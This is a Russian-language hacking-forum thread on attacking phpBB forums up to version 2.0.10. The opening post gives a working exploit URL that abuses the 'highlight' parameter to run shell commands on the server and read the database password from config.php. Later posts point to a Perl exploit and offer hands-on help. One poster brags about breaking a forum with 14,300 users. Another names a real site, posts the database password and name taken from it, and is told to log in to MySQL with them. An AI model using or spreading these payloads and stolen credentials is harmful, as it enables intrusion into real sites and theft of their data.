сначало античат ПРОЧИТАЙ Уязвимость в phpBB <= 2.0.10 http://[target]/forum/viewtopic.php?p=123&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;uname%20-a;cat%20config.php|grep%20db Условия срабатывания - тема p=123 должна существовать. Пример http://[Target]/viewtopic.php?p=44&highlight=%2527.$poster=$dbpasswd.%2527
а если лень руками вбивать идешь на rst.void.ru качаешь оотуда сплойт на перле для версии 2.0.10 и пользуешься на здоровье=) только вот не думаю что остались сайты с уязвимыми десятками..
m0nzt3r, я вчера ломал челу форум phpbb 2.0.6 , где было зарегано 14300человек =) maR, а если ничего не выйдет, смело стучись мне в асю, помогу!
А ты точно уверен что десятка стоит? Если не работает: 1. Руки... 2. Прикрыли... Решение: попробуй снифак зафигачить...
Dark Angel, стучись в асю или пиши в приват-помогу. =) Десятки(если это действительно десятки) ломаются легко.
Dark Angel Админ там может написать всё что угодно для замыливания глаз)) На самом деле может быть пропатчен, или же новая версия стоять.. Всё равно удачи те!
У меня есть схожая проблема. Версия форума - 2.0.10, но он стоит на smallnuke. Какие варианты есть, подскажите? ...еще очень часто встречаю phpbb на пхп-нюках, как их ломать? Все говорят что нюк - самая бажная система, но тем не менее я не смог найти ни один сплоит или sql-inj для современных версий.
Dark Angel Попробуй экслойты каких-нить других версий! Может для 2.0.18 или ниже подойдёт? http://forum.antichat.ru/thread10613.html Вот почитай!
народ всё работает ето просто все пропеченые наверно паподались!!! после 3 часов поиска нашол нормалный вот он!!!! http://www.gorodzelenogorsk.ru/forum/index.php ну палучил вот ето: dbpasswd---------PawHikat dbname-----------host2254 заважу в FTP и нифега!!!! чо может быть с партом ошибся????
ну вообще-то если ты не видишь у тебя логин и пароль от БД, а не от ФТП.. =) к сведению: Пароли БД не всегда подходят к ФТП.. так что коннект делай к MySQL =) имхо)
